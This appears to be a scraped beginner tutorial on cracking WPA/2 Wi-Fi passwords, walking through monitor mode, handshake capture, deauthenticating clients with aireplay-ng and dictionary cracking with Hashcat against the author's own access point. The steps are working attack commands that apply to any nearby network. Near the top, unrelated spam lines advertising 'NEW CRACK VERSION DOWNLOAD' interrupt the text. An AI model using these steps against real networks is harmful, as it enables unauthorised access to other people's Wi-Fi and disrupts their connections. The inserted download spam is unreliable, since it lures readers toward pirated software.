Cracking WPA/2 with Hashcat in Windows | Tutorial for beginners

In this tutorial, I will demonstrate how we can use both Windows and Linux to crack WPA/2 encryption.

The reason, I am using Windows and Linux Operating Systems, is because my Linux Os is running off a virtual machine. And due to limitations to the Hypervisor, virtual machines can't communicate directly with the graphics card itself. As result, I will be using my Windows machine that has a Nvidia GTX 465 graphics card to do all the WPA/2 key cracking.

dowwnload 

Watch

Install

NEW CRACK VERSION DOWNLOAD 2024

NEW CRACK VERSION DOWNLOAD 2023

NEW CRACK VERSION DOWNLOAD 2022

NEW CRACK VERSION DOWNLOAD 2020

Furthermore, another reason to use Linux is because of the Wireless Injection drivers that work better under Linux than under Windows. Even though, it is possible to inject wireless frames under Windows, the hardware is very expensive and not many of us are financially capable of affording one. So therefore, I highly recommend you to use Linux for this part of the tutorial.

I understand some of you out there, have little or no experience at all using Linux. That's why I made this tutorial as simple as possible. If you follow it carefully and put some effort into it, you will succeed.

WARNING: Before you proceed with the steps below, you must ensure you have a compatible hardware 

or there won't be a guarantee that things will work for you.

1) Compatible adapters

• Alfa AWUS036H
• Alfa AWUS036NHA

If your adapter is known to support Packet monitoring and Injection, you might as well just use it. 
Or else you will need to purchase one of the adapters above.
Be aware that, only USB adapters will work with Virtualbox, if you have a built in or internal WIFI adapter it will NOT WORK!

2) Compatible graphics cards

Step 1

Download Virtualbox from this URL
( https://www.virtualbox.org/wiki/Downloads )

Step 2

Download Backtrack from this URL
( http://www.backtrack-linux.org/downloads/ )
Remember to download the (Backtrack R3, X64 KDE) version.

Step 3

We need to setup our virtual machine, so that we can install Backtrack on it.
The Youtube videos below will walk you through the process of setting up and installing Backtrack on your VM.

How to create a Virtual Machine?

How to install Backtrack 5 R3?

Step 4

Now, we are going to download Hashcat and setup a working directory along with wordlists for it.

( http://hashcat.net/oclhashcat-plus/ )

Once you've downloaded the Hashcat files, create a folder in the root directory of you

C:\ drive and call it Hashcat. Then unzip all the file contents you've just downloaded in there. They should look like the screen shot below.

[img]http://infiltrator.webs.com/images/Untitled.png[/img]

Step 5

Now we need to acquire our wordlists. The wordlists provided in the following URL are highly recommended. 

Download whatever ones you can and save them into the Hashcat directory you've created.

If you require more wordlists, feel free to PM me!

( http://blog.g0tmi1k.com/2011/06/dictiona...lists.html )

Step 6

Let's get started, I am going to setup a target AP called "HackMe" and for the sake of this tutorial, 

I will create a very simple pass-phrase, so that we can crack it successfully. 

The Wireless Access Point that I am using, it's a NetGear N150 Wireless router WNR100 v3. 

You can use any other brand or model of Wireless router that pleases you.

Now head over to your virtual machine and fire up your Backtrack 5 OS. 

Once it's up and running, connect your WIFI adapter to your host system and issue the following command:

lsusb

Step 7

Provided there are no errors or issues, let's first put our Wifi card into monitor mode and then after let's create a monitor mode interface called "Mon0". In your Backtrack 5 VM, open up a terminal and type the following commands:

airmon-ng

Then

airmon-ng start wlan0

Step 8

Now that our WIFI card is in monitor monitor, we are going to use the Airodump-ng utility to monitor what Wireless networks are available for us.

In the terminal type airodump-ng followed by the monitor interface. The monitor interface will be "mon0". This can very depending on your adapter chipset.

airodump-ng mon0

Now that we identified our target of choice, lets instruct Airodump-ng to monitor the "HackMe" Wireless AP. And have it record all the wireless traffic to a .cap file so that we can capture the handshake, in order to crack the WPA/2 key.

airodump-ng --channel <target's channel> --bssid <Target AP's MAC address> -w HackMe mon0

In order to capture the WPA handshake, we can wait for a client to authenticate to our AP, or we can deauthenticate a client that is already authenticated.

To deauthenticate a client, we use the Aireplay-ng utility which is part of the Aircrack-ng suite. The command is as follows:

aireplay-ng -0 10 -a <MAC address of target AP> -c <MAC address of targeted client> mon0

Step 9

Now that, we know the WPA handshake is valid. We use the Aircrack-ng utility to convert the HackME.cap file into a HackME.hccap file.
By default, Hashcat only take it's own .hccap file format. We can't use .pcap or .cap files as they are not supported file formats.

Converting the .cap file into the .hccap is very simple. First, we do an ls command to verify our HackMe.cap exists.

[img]http://infiltrator.webs.com/images/aircrack-ng1.png[/img]

So the HackME.cap exist, now we use the following command to convert our .cap file.

aircrack-ng HackME.cap -J HackME.hccap

ircrack-ng has now finished converting the .cap file. We now need to import the HackME.hccap file into our Windows machine, so that we can crack the WPA key with Hashcat.

To import the .hccap file, I will be using Dropbox. I will show you, how the installation is done on the Linux side. 
On the Windows side it should be a straight and simple installation for a GUI guru like yourself.

Hashcat command:

cudaHashcat-plus64.exe -m 2500 HackMe-01.hccap rockyou.txt